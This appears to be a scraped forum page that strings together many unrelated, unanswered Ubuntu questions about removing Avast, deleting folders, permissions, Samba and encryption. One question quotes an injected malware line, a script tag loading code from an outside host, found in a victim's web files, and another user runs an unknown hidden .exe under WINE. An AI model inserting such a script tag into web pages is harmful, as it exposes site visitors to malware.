Ubuntu Security :: Deleting Avast And Folders On Slow Os?
Aug 11, 2010
I installed avast anti-virus on my 10.04 T42p thinkpad. It immediately slowed to a walk! and the registration number did not work and caused an error message. I tried to reinstall the program with no improvement/same result. then tried to remove the program from the machine with dpkg. Seemed to get rid of it but some of the folders it created are still there and won't let me trash them. The machine still seems slow, so how do I get rid of all traces of avast?
I recently installed Avast on my PC bcz of M$ Windows taht I also have as 2nd OS which loves Viruses It was having the virus database of 2006,So I decided to update it After the updatation completed,I clicked on Application>Accessories>Avast!Antivirus. But Avast is not coming anywhere, whereas it was earlier coming Can somebody guide me where it has gone & how to bring it back to save my PC..
I heard Linux's security is actually worse than Windows. What could I do to make it more secure? I can't download programs such as Avast and Spybot, right?
I'm pretty new to Ubuntu and it might not be possible to do what I want to do here. First I'll explain the situation. Throught trying to tidy up my mp3 collection usign various pieces of software I now have a folder structure that I want (My MusicArtistalbum rack), However, in the process, I have been left with lots of other folders - these have had the mp3's removed but they contain other files (artwork, playlists, .nfo files - that kind of thing).
What I'm looking for is either a premade solution or help with a script to do the following : Check all folders in my music folder, if the folder doesn't contain any mp3's then check the subfolders, if none of them contain mp3's then delete the main folder (regardless of what otehr files are within it).
It seems like I should be able to do this - but not sure how. Incidentally, I have backed up my music folder to an external disk - so I can't do any lasting damage
I have the following script to delete some folders from a text file:
Code: #!/bin/bash current_dir=$(pwd) for folder in `cat dir_list.txt`; do
[Code]....
This does not work. If I delete them manually it works fine, but in the script it just finishes quickly. When the variables are echoed they display the values correctly.
I accidentally created a folder in my /home directory and its ticking me off because i cant delete it and im anal about my organization on the computer and having this extra empty folder.
So I have a share hosting account with 60 sites all running wordpress.
There is a plugin I want to delete from all 60 wordpress sites.
The plugin is in the same path in all 60 sites.
mysite.com/wp-content/plugins/carter Is there a way I can search the entire home directory with filezilla or another ftp and delete every folder with that name in every site or I have to do it the tedious 1by1 sucky way?
I'm trying to clean up a few hundred thousand mp3 files and I'm dying to find a way to automate some of the mechanical tasks I keep doing. It seems like at least two of these tasks could be easily accomplished with something at the command line, but I don't have the chops/know-how to figure out how (and would really rather not trial and error with batch deleting files & folders...).
1) Delete all folders named "_MACOSX" (and all subfolders/files contained therein) -- Basically, I'd like to apply this command to a few hundred directories that may or may not contain a subfolder called "_MACOSX" that I'd really like to get rid of.
2) Delete all files named "*.m3u". -- Similar to the first, I want to automatically scan all directories and subdirectories in a given location for all instances of this file-type and delete them wherever they're found.
3) Move all files named *.txt", "*.doc", "*.pdf" to a specific location. -- Similar to the last, except instead of deleting, I'd like to just move them, so that if there is anything worth keeping, I can keep it.
I have recently been the victim of identify theft and have coincidentally noticed that my router has been under attack for the past few days. I've been monitoring the log on my router (a D-Link DI-624+A) and suddenly while I was on Skype, my wireless connection was lost. I reconnected and found that the router's log had been erased. It appears from the log that the hacker has so far been unsuccessful. I have already done a 'whois' on several of the IPs this hacker has been using and have notified the respective ISPs.
Is it possible to remotely delete a router log?
Here's an example of my log before and after the delete:
Code: Wed Nov 10 18:00:24 2010 Unrecognized attempt blocked from 221.136.83.1:40245 to xxx.xxx.xxx.xxx TCP:8080 Wed Nov 10 18:08:24 2010 Unrecognized attempt blocked from 60.173.26.168:6000 to xxx.xxx.xxx.xxx TCP:9415
My problem is that I have a folder that had been "lost", aning that it isn't seen by either Windows or Ubuntu. I was able to recover the data from the folder by using a program off the Ultimate Boot CD for Windows called Handy Recovery, but I don't know how to get rid of the folder and files I had backed up. "What's the problem if it's gone?" you might ask? Because the hard drive space is being taken up with the files. I can't access these files, yet they are still there taking up space. What programs are available on Ubuntu that will get rid of these files (and these files *only*) without wiping out the partition?
I posted this yesterday, but my post completely disappeared (I looked high and low -- nothing.) I am using Ubuntu Server 10.04, all the latests updates. For an FTP Server, I use ProFTP.
One specific directory, and it's subdirectories on my server will not download at a reasonable rate. They move at about 17-50KBPS. All other folders work fine, at around 1.5-2.5MBPS.
What is going on? I have no idea how to troubleshoot this. The files being transfered are in a directory under home. They should have no permissions issues (I reapplied the permissions I want already), I tried restarting ProFTP, the files vary in sizes (from a few kilobytes to about 120 megabytes). I use Webmin for most web management.
I am not having overload issues with my network card or CPU utilization while downloading these files. They are being accessed from the local network.
This issue is taxing because the files in question are backup files.
With Ubuntu 9.10 and 10.0.4 I have seen that the nautilus filemanager is extremely slow with folders that contains many files or/and folders.I made sure that "Assistive Technologies" is diable. On the filemanager preference I set all preview to "Never", tried all possible views, but the filemanager remains extremely slow. It seems like it becomes even slower when the subfolders in the folder you are viewing new files are being created by for example a program. Possibly nautilus filemanager is updating continuously ?
I use to be using debian etch nautilus file manager. With the same directories, nautilus in debain etch was working much faster. But contrary to the one in Ubuntu 9.10 and 10.0.4 is is far less stable. It seems like the newer version is more stable but however extremely much slower. I was wondering if I am missing something. Or whether this is a bug. If it is a bug, then I am wondering when this is going to be solved in nautlius filemanager.
Anybody know why fedora 14 is so slow open partitions on same the hard disc as the OS and other hard discs. Is there a problem with Nautilus, the kernel or the nvidia driver or something else? On average it takes me 10-15 seconds to open a new partition in nautilus. The system as it stands is not up to scratch and i am sorry to say it is really unusable. Do i hang in there for a while and hope for a fix or do i go back to fedora 13?
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
im trying to extract a skin into the amsn skin directory and it says im not allowed so i went into the users and groups and i set my self up to be able to do all the commands and put myself in the root catagory of users. this is where im lost im still unable to do anything.. i want complete administrator access on my OS i shouldnt have to type in sudo -
I've recently upgraded to 10.04 and have noticed that all the files or folders I've been creating recently are read only. I can manipulate the folders on my ubuntu system itself and create new entries, folderes, subfolders, and save files. IE a payment receipt in pdf format. However if I then try to move or copy any of these to my DROBO (data storage device) the file gets the LOCK Icon on it and becomes read only. If it is a subfolder I can no longer copy to it and if it's a regular file, say a pdf or flv I can't modify it. Attempting to change the file permissions on either my ubuntu desktop or any other folder works but once it goes to the drobo I lose the ability to change it off of ---. Again, this was all working fine before doing the upgrade to 10.04. Yes I did do a clean install to 10.04.
I have a shared partition on Ubuntu, 'dm-6', if I create a new folder in it, it has 'teocomi' as owner. If I create the folder from another (windows) PC the owner is 'nobody' and from Ubuntu I have to chmod/chown it in oredr to edit its content...Is there a way to set automatically permission and owner for newly created folders and directories?
I installed Ubuntu 10.10 64 on my laptop with the entire 500gb setup as encrypted LVM. This has worked well for several months with no problems. During this time i have been backing up the data to an external usb drive (1tb) on a regular basis. The usb drive was not encrypted. So, I thought it would be a good idea to encrypt the backup drive too. I wiped out the backup drive and set it up as one large encrypted lvm and mbr. This seemed to work fine but immediately afterwards I decided to erase that and set it up as encrypted lvm guid instead of mbr. I couldn't delete it while logged into my desktop so i decided to do it from a bootable gparted usb stick. In gparted i erased the 1TB backup drive once again and planned on setting it up the way I wanted once I was logged back into my ubuntu desktop. Now I cant boot into my desktop with the following errors:
cryptsetup: evms_activate is not available b0d) does not begin with /dev/mapper/
Then after waiting for a few minutes I get an error followed by (initramfs)
When booting from a live version of ubuntu the 250MB boot patition is recognized and 500 partion is there but it is labeled as empty/unused.
Also, I did choose to use the exact same passphrase as what is used on the main bootable drive when I set up the encrypted partition on the external 1TB drive.
I have a Ubuntu file server with a mix of 30+ users ( mix of windows and linux ).All are members of the same group. All need read write create access. I want to prevent deletion of certain key folders. How can I achieve this ? sudo chmod -R nnnn ??
I have been running rkhunter but how do i view the /var/log/rkhunter.log? I have tried using: sudo /var/log/rkhunter.log but all i got was "Command not found?
Still working on the mask of files for shared folder. I now have a shared folder with the exact behavior I expect : Code: sudo addgroup share_group sudo mkdir /media/volume/shared_dir sudo chgrp share_group /media/volume/shared_dir sudo chmod g+s /media/volume/shared_dir sudo chmod 770 /media/volume/shared_dir sudo setfacl -d -m group::rwx /media/volume/shared_dir sudo setfacl -d -m other::--- /media/volume/shared_dir emma@box:/media/volume/shared_dir$ ls -al total 8 drwxrws---+ 2 root share_group 4096 2010-02-09 12:53 . drwxr-xr-x 8 root root 4096 2010-02-09 11:58 .. -rw-rw----+ 1 emma share_group 0 2010-02-09 12:53 test By default, user from the group can modify this file. That's perfect.
I have define the share in Samba this way : Code: [share] comment = Shared Folder path = /media/volume/shared_dir browseable = yes guest ok = no read only = no hide dot file = yes # force group = share_group # create mask = 0660 # directory mask = 0770 # force create mask = 0660 # force directory mask = 0770
When drag & dropping a file in this share, here is the default mask: Code: emma@box:/media/volume/shared_dir$ ls -al total 192 drwxrws---+ 2 root share_group 4096 2010-02-09 12:54 . drwxr-xr-x 8 root root 4096 2010-02-09 11:58 .. -rw-rwx---+ 1 emma share_group 6148 2010-02-09 12:54 .DS_Store -rw-rwxr--+ 1 emma share_group 176684 2009-12-21 23:33 IMG_7487.jpg
So the dropped file have execution rights for the group, and read access for other. I expected it to have the same rights than the file created directly using the touch command. I tried to play with the mask options, without success. The file has been dropped from my mac, which is a Unix like OS. I guess that some authorization access are inherited from the original file, for the user and other parts. But where does the group authorization come from ? Moreover, is is possible to define in samba a default mask, whatever the authorization of the original file?
After trying Truecrypt, LUKS, and Ecryptfs I decided to try NTFS encryption. Now, on a dual boot computer from Ubuntu I can browse the encrypted folders but can not open the encrypted files. All attempts produce access denials yet the Unix file permissions appear to be "0777" (owner, group, and world readable-writable).
Is there someway to get Ubuntu's NTFS software to recognize and decrypt the encrypted files? Would a different NTFS package work such as NTFS-3g?
I have network shares automounted in /media and I want to exclude them from my automatic scheduled ClamAV scan in Maverick. How do I do this? I can't find any CRON link or script that actually starts the scan. Is it the Daemon that does this?
I have avast anti virus installed and it has been fine, but yesterday i downloaded updates for it and since then whenever i try to run the program i get an error and it refuses to run.
I want to install AVAST 4 ver 1.3, but the problem is that I have already installed the previous version 1.0 How can I uninstall the previous? If I write in the terminal:
sudo dpkg -r avast4workstation
then Ubuntu ask me the password, but my keyboard does not work, I am not able to write!!!
I want to make a script that will check my server files using avast
avast -a -c /home/lance/Documents -r=/home/lance/report/avastlog.txt
I get #------------------------------------------------------------------- # Date: Sat Jul 31 19:49:46 2010 # Scanned areas: # /home/lance/Documents # # # Statistics: # # scanned files: 1909 # scanned directories: 90 # infected files: 0 # total file size: 71.2 MB # virus database: 100730-1 30.07.2010 # test elapsed: 4s 950ms
but i want what i see in the command line to show in the report. How do i do that? below is a sample of the command line /home/l/Documents/readguide04.pdf [OK] /home/l/Documents/smb.conf [OK] /home/l/Documents/wireless.txt [OK] /home/l/Documents/xp key.txt [OK] /home/l/Documents/Welcome Bishop Fernando Isern.html [OK] Archived /home/l/Documents/.doc/_1_CompObj [OK] Archived /home/l/Documents/.doc/1Table [OK] Archived /home/l/Documents/.doc/WordDocument [OK] Archived /home/l/Documents/.docyInformation [OK] /home/lance/Documents/NOVENA TO SAINT BERNADETTE SOUBIROUS.doc [OK] # # Statistics: # # scanned files: 1909 # scanned directories: 90 # infected files: 0 # total file size: 71.2 MB # virus database: 100730-1 30.07.2010 # test elapsed: 4s 950ms #
Recently I've been finding two strange-looking files on my Windows shared folders! Their names are 'khy' and 'qffhtx.exe', they appear as hidden, and they're hard to delete!! especially the first one because it has no extension. I use Ubuntu 10.10, but I am worried because I also dual-boot Windows XP. Today I tried to open the .exe file in nautilus to see what is inside and I received the message "Unable to open archive", 'khy' is apparently an empty text file. Then I unmounted my /home partition so my files are out of the way, and I ran the .exe file using WINE,
Now I have a strange-looking applet on my top panel!! and it says "Script paused", also it says "Exit', and also Wine command prompt says something strange about "LockWindowUpdate", don't imagine it I'll post the screenshots so you can see it for yourselves. Also --and this is weird-- the virus apparently is trying to call a Windows process named csrcs.exe!! Again, I'll post the screenshots.
If this is a virus, then it's like a fish out of the water on my Ubuntu, it's probably trying to do something but it can't find its way around, it's kinda funny, but Im worried because I also dual-boot Windows XP, I'm having a hard time trying to remember the name KHY, it's a very weird acronym, it's the acronym of a disease, according to what I googled, i'm sure it's a virus!!! Anyway it's HARD to remember!!!
what can I do about this? How can I see the "script"? can Ubuntu kick its ***?how can I clean my Windows?
